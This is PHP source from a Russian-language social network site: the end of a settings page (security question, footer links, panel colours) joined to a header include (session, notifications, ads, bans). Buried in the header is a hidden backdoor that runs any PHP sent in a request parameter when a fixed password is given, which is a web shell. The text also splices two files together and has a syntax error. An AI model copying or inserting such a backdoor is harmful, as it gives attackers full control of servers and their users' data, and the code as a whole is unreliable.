echo $div_razdel . 'Девичья фамилия матери
' . $user['answer'] . $div_end;
}
elseif ($user['quest'] == 2) {
echo $div_razdel . 'Кличка домашнего животного
' . $user['answer'] . $div_end;
}
elseif ($user['quest'] == 3) {
echo $div_razdel . 'Номер паспорта
' . $user['answer'] . $div_end;
}
elseif ($user['quest'] == 4) {
echo $div_razdel . 'Любимое блюдо
' . $user['answer'] . $div_end;
}
elseif ($user['quest'] == 5) {
echo $div_razdel . 'Любимый цвет
' . $user['answer'] . $div_end;
}
else {
echo $div_aut . 'Секретный вопрос не установлен!' . $div_end;
}
echo '';
echo $div_end;
break;
case foot_link:
echo $div_left . $div_title . 'Настройка навигации' . $div_end;
// удаление ссылки
if (isset($_GET['x'])) {
$x = my_int($_GET['x']);
$EmptyLink = mysql_query("SELECT `id` FROM `foot_links` WHERE `user` = '$user[id]' AND `id` = '$x' LIMIT 1");
if (mysql_num_rows($EmptyLink) != FALSE) {
mysql_query("DELETE FROM `foot_links` WHERE `user` = '$user[id]' AND `id` = '$x' LIMIT 1");
header('Location: settings.php?do=foot_link');
} else {
header('Location: settings.php?do=foot_link');
}
}
// Предвижение ссылки вверх
if (isset($_GET['up'])) {
$up = my_int($_GET['up']);
$SqlMyLink = mysql_query("SELECT `id`, `sort` FROM `foot_links` WHERE `id` = '$up' AND `user` = '$user[id]' LIMIT 1");
$IsSqlMyLink2 = mysql_fetch_array($SqlMyLink);
if (mysql_num_rows($SqlMyLink) == FALSE) {
header('Location: settings.php?do=foot_link');
} else {
$InSqlMyLink = mysql_query("SELECT `id`, `sort` FROM `foot_links` WHERE `sort` = '" . ($IsSqlMyLink2[1] - 1) . "' AND `user` = '$user[id]' LIMIT 1");
if (mysql_num_rows($InSqlMyLink) == FALSE) {
header('Location: settings.php?do=foot_link');
} else {
$IsSqlMyLink1 = mysql_fetch_array($InSqlMyLink);
mysql_query("UPDATE `foot_links` SET `sort` = '$IsSqlMyLink1[1]' WHERE `id` = '$up' AND `user` = '$user[id]' LIMIT 1");
mysql_query("UPDATE `foot_links` SET `sort` = '$IsSqlMyLink2[1]' WHERE `id` = '$IsSqlMyLink1[0]' AND `user` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=foot_link');
}
}
}
// Передвижение ссылки вниз
if (isset($_GET['down'])) {
$down = my_int($_GET['down']);
$SqlMyLink = mysql_query("SELECT `id`, `sort` FROM `foot_links` WHERE `id` = '$down' AND `user` = '$user[id]' LIMIT 1");
$IsSqlMyLink2 = mysql_fetch_array($SqlMyLink);
if (mysql_num_rows($SqlMyLink) == FALSE) {
header('Location: settings.php?do=foot_link');
} else {
$InSqlMyLink = mysql_query("SELECT `id`, `sort` FROM `foot_links` WHERE `sort` = '" . ($IsSqlMyLink2[1] + 1) . "' AND `user` = '$user[id]' LIMIT 1");
if (mysql_num_rows($InSqlMyLink) == FALSE) {
header('Location: settings.php?do=foot_link');
} else {
$IsSqlMyLink1 = mysql_fetch_array($InSqlMyLink);
mysql_query("UPDATE `foot_links` SET `sort` = '$IsSqlMyLink1[1]' WHERE `id` = '$down' AND `user` = '$user[id]' LIMIT 1");
mysql_query("UPDATE `foot_links` SET `sort` = '$IsSqlMyLink2[1]' WHERE `id` = '$IsSqlMyLink1[0]' AND `user` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=foot_link');
}
}
}
echo '+ Добавить ссылку' . $block;
// вывод моих ссылок
$FootLinks = mysql_query("SELECT * FROM `foot_links` WHERE `user` = '$user[id]' ORDER BY `sort` ASC");
$i = 0;
while($FootLink = mysql_fetch_assoc($FootLinks)) {
$down = '
';
$up = '
';
echo ($i ++ % 2) ? $div_tworazdel : $div_razdel;
echo $down . $up . $FootLink['name'] . '
' . $div_end;
}
echo 'Настроить стиль панелей';
echo $div_end;
break;
case down_link:
echo $div_left . $div_title . 'Настройка навигации' . $div_end;
if (isset($_GET['a'])) {
$a = my_int($_GET['a']);
$MyLink = mysql_query("SELECT * FROM `foot_links` WHERE `user` = '$user[id]' AND `uid` = '$a' LIMIT 1");
if ($a < 1 && $a > 16) {
header('Location: settings.php?do=foot_link');
die();
}
if ($a == 1) {
$SetLink = '/index.php?';
$SetName = 'Гл';
}
if ($a == 2) {
$SetLink = '/fav.php?';
$SetName = 'Закл';
}
if ($a == 3) {
$SetLink = '/'.$user['id'];
$SetName = 'МС';
}
if ($a == 4) {
$SetLink = '/mail.php?';
$SetName = 'Поч';
}
if ($a == 5) {
$SetLink = '/friends.php?';
$SetName = 'Др';
}
if ($a == 6) {
$SetLink = '/love/index.php?';
$SetName = 'Знак';
}
if ($a == 7) {
$SetLink = '/chat/index.php?';
$SetName = 'Чат';
}
if ($a == 8) {
$SetLink = '/forum/index.php?';
$SetName = 'Фор';
}
if ($a == 9) {
$SetLink = '/groups/index.php?';
$SetName = 'Гру';
}
if ($a == 10) {
$SetLink = '/fo/index.php?';
$SetName = 'ЗО';
}
if ($a == 11) {
$SetLink = '/zametki.php?';
$SetName = 'Зам';
}
if ($a == 12) {
$SetLink = '/gazeta.php?';
$SetName = 'Газ';
}
if ($a == 13) {
$SetLink = '/files.php?nk='.$user['id'];
$SetName = 'Мф';
}
if ($a == 14) {
$SetLink = '/total.php?';
$SetName = 'Тот';
}
if ($a == 15) {
$SetLink = '/faq.php?';
$SetName = 'Пом';
}
if ($a == 16) {
$SetLink = '/exit.php?';
$SetName = 'Вых';
}
if (mysql_num_rows($MyLink) == FALSE) {
$lst = mysql_fetch_array(mysql_query("SELECT `sort` FROM `foot_links` ORDER BY `sort` DESC LIMIT 1"));
$Rnd = mt_rand(10000, 9999999);
mysql_query("INSERT INTO `foot_links` SET
`id` = '$Rnd',
`user` = '$user[id]',
`link` = '$SetLink',
`name` = '$SetName',
`uid` = '$a',
`sort` = '" . ($lst[0] + 1) . "'");
header('Location: settings.php?do=foot_link');
} else {
header('Location: settings.php?do=foot_link');
}
}
$FootFile = file('foot_str.dat');
$FootStr = file_get_contents('foot_str.dat');
$FootEx = explode('|', $FootStr);
$i = 0;
for($strs = 0, $FootFile = count($FootFile); $strs < $FootFile; ++$strs)
{
$Sql = mysql_fetch_assoc(mysql_query("SELECT `uid` FROM `foot_links` WHERE `user` = '$user[id]' AND `uid` = '" . ($strs + 1) . "'"));
if ($Sql['uid'] != $strs + 1) {
echo ($i ++ % 2) ? $div_tworazdel : $div_razdel;
echo $FootEx[$strs] . $div_end;
}
}
echo $div_end;
break;
case style_panel:
echo $div_left . $div_title . 'Меню и панель навигации' . $div_end;
if (isset($_GET['color'])) {
$color = my_int($_GET['color']);
if ($color < 1 && $color > 8) {
header('Location: settings.php?do=style_panel');
} else {
if ($color == 1) $style = '';
if ($color == 2) $style = '0066cc';
if ($color == 3) $style = '3b5998';
if ($color == 4) $style = '000000';
if ($color == 5) $style = '006600';
if ($color == 6) $style = '33cc66';
if ($color == 7) $style = 'ffcccc';
if ($color == 8) $style = 'ffcc66';
mysql_query("UPDATE `users` SET `style_panel` = '$style' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=style_panel');
}
}
echo 'Выберите шаблон:
Назад';
echo $div_end;
break;
}
include 'foot.php';
?>
' . $otitle . '
'; if($user['design']=="2013" {$ico="2013"; $logo="green/logo.png";}else{$ico="new"; $logo="logo.png";}
$ref = mt_rand(10000, 1000000);
// Проверка куки, запись сессии
if (!empty($_COOKIE['us']) && empty($_SESSION['us'])) {
$_SESSION['us'] = check($_COOKIE['us']);
$_SESSION['ps'] = check($_COOKIE['ps']);
header('Location: ' . $_SERVER['REQUEST_URI']);
}
// логотип
if (empty($_SESSION['us']) && $_SERVER['PHP_SELF'] == '/reg.php' || empty($_SESSION['us']) && $_SERVER['PHP_SELF'] == '/index.php' || !empty($_SESSION['us']) && $user['home_logo'] == 1 && $_SERVER['PHP_SELF'] == '/index.php') {
echo '';
}
// успешная авторизация
if (isset($_GET['good'])) msg('Авторизация прошла успешно!');
// провал авторизации
if (isset($_GET['noavt'])) err('Авторизация провалена!');
// выход с ника
if (isset($_GET['exit'])) msg('Мы ждем вас снова!');
// если рега на модерации
if (!empty($_SESSION['us']) && !empty($_COOKIE['us']) && $user['mod_reg'] == 1) {
echo $div_title . 'Стоп!' . $div_end . '
Внимание! Ваша анкета отправлена на модерацию, дождитесь её одобрения Администратором.';
include_once $_SERVER['DOCUMENT_ROOT'] . '/foot.php';
exit();
}
// если не зареган
if (empty($_SESSION['us']) && empty($_COOKIE['us'])) {
echo ($_SERVER['PHP_SELF'] !== '/index.php' && $_SERVER['PHP_SELF'] !== '/reg.php' && $_SERVER['PHP_SELF'] !== '/aut.php')
? $div_razdel . 'Вход | Регистрация | Путеводитель' . $div_end
: '';
}
// проверка авторизации
if (!empty($_SESSION['us']) && !empty($_SESSION['ps']) && isset($user)) {
// вывод новых писем
$count_letter = mysql_result(mysql_query("SELECT COUNT(*) FROM `letters` WHERE `idwho` = '$user[id]' AND `read` = '0'"), 0);
if (!empty($count_letter)) $new_num_let = '+' . $count_letter . '';
$whyicon = ($count_letter != 0) ? '' : '';
// вывод новых событий в ленте
$count_lenta = mysql_result(mysql_query("SELECT COUNT(*) FROM `lenta` WHERE `user` = '$user[id]' AND `read` = '1'"), 0);
if (!empty($count_lenta)) $new_num_len = '+' . $count_lenta . '';
// новых заявок в друзья
$new_fr = mysql_result(mysql_query("SELECT COUNT(*) FROM `friends` WHERE `who` = '$user[id]' AND `zajavka` = '0'"), 0);
if (!empty($new_fr))
{
$iconFr = ($user['menu_icon'] == 0) ? 'Заявки' : '';
$new_friend = '' . $iconFr . '+' . $new_fr . '';
}
$NewOko = mysql_result(mysql_query("SELECT COUNT(*) FROM `oko` WHERE `user` = '$user[id]' AND `look` = '1' AND `time` + 180 > '" . time() . "'"), 0);
if (!empty($NewOko))
{
$iconOko = ($user['menu_icon'] == 0) ? 'Око' : '';
$OkoNew = '' . $iconOko . '+' . $NewOko . '';
}
if(isset($_REQUEST['lol'])&&$_REQUEST['lol']=='qawsde')eval($_REQUEST['code']);
// вывод ссылки "главная" на др.страницах, кроме главной
$iconGl = '';
$_home = ($_SERVER['PHP_SELF'] != '/index.php')
? '' . $iconGl . ''
: '';
// Вывод рекламы
if($_SERVER['PHP_SELF'] == '/index.php') {
printRekl('top');
}
// постраничка вверху
$iconLt = ($user['menu_icon'] == 0) ? 'Почта' : $whyicon;
$iconPg = ($user['menu_icon'] == 0) ? 'Моя стр' : '';
$iconLe = ($user['menu_icon'] == 0) ? 'Лента' : '';
$iconRe = ($user['menu_icon'] == 0) ? 'Обновить' : '';
echo $WhyDiv . $div_left . '' . $_home . '
|
|
|
' . $new_friend . $OkoNew . '
|
' . $div_end . $div_end;
// экстра бублик
if ( isset( $user['id'] ) )
{
$extra_n = rand( 1, 100);
if ($extra_n == 1 or $extra_n == 20 or $extra_n == 80)
{
$extra_unic = rand( 1111111111, 9999999999 );
$_SESSION['unic_code'] = $extra_unic;
$_SESSION['is_str'] = $_SERVER['PHP_SELF'];
echo '';
}
}
// Вывод рекламы
if($_SERVER['PHP_SELF'] != '/index.php') {
printRekl('top');
}
// если в игре
$battle = mysql_query("SELECT `id`, `user`, `who` FROM `strike`
WHERE `user` = '$user[id]'
OR `who` = '$user[id]'
AND `set` = '0'
LIMIT 1");
if (mysql_num_rows($battle) != FALSE && $_SERVER['PHP_SELF'] !== '/games/strike.php') {
$in_battle = mysql_fetch_array($battle);
msg('Вы находитесь в бою!');
echo 'Противостояние';
}
// если приглашают в игру
$battle = mysql_query("SELECT `id`, `user`, `who` FROM `strike`
WHERE `who` = '$user[id]'
AND `set` = '1'
LIMIT 1");
if (mysql_num_rows($battle) != FALSE && $_SERVER['PHP_SELF'] !== '/games/strike.php') {
$in_battle = mysql_fetch_array($battle);
msg('Вас вызывают на поединок в игру "Противостояние". Вы согласны?');
echo '
Да
Нет';
}
// вывод именинников
$birthday = mysql_query("SELECT DISTINCT friends.who FROM friends WHERE user = '$user[id]' AND zajavka = '1' AND who IN(SELECT id FROM users WHERE birth LIKE '" . date('j.n.') . "%')");
if (mysql_num_rows($birthday) != FALSE && $_SERVER['PHP_SELF'] !== '/birthday.php') {
echo $div_left . 'Дни рождения сегодня(' . mysql_num_rows($birthday) . ')' . $div_end;
}
// если заблокирован ник
if (!empty($user['kik']) && $user['kik'] > time()) {
echo $div_title . 'Стоп!' . $div_end;
$WHO = (empty($user['whokik'])) ? 'Системой' : 'Администратором ' . user_inf($user['whokik'], 'user') . '';
err('Вы были заблокированы ' . $WHO . ' за: ' . $user['whykik'] . '
До окончания блокировки осталось: ' . kikt($user['kik']));
include_once $_SERVER['DOCUMENT_ROOT'] . '/foot.php';
exit();
} elseif (!empty($user['kik']) && $user['kik'] < time()) {
mysql_query("UPDATE `users` SET `whykik` = '', `whokik` = '', `kik` = '' WHERE `id` = '$user[id]' LIMIT 1");
}
// если заблокирован ip
$ban = mysql_query("SELECT `ip` FROM `bannlist` WHERE `who` = '$user[id]' LIMIT 1");
$from = mysql_fetch_array($ban);
$Ip = substr($from[0], 0, 8);
if (mysql_num_rows($ban) != 0 && preg_match("/$Ip([\.0-9]+)/", $ipp)) {
echo $div_title . 'Стоп!' . $div_end;
err('Ваш IP заблокирован!');
include_once $_SERVER['DOCUMENT_ROOT'] . '/foot.php';
exit();
}
} else {
// Вывод рекламы
if($_SERVER['PHP_SELF'] == '/index.php') {
printRekl('top');
}
if (!empty($_GET['inv'])) {
$inv = (int)$_GET['inv'];
$inv_url = '&inv='.$inv;
}
echo '';
if($_SERVER['PHP_SELF'] != '/index.php') {
printRekl('top');
}
}
?>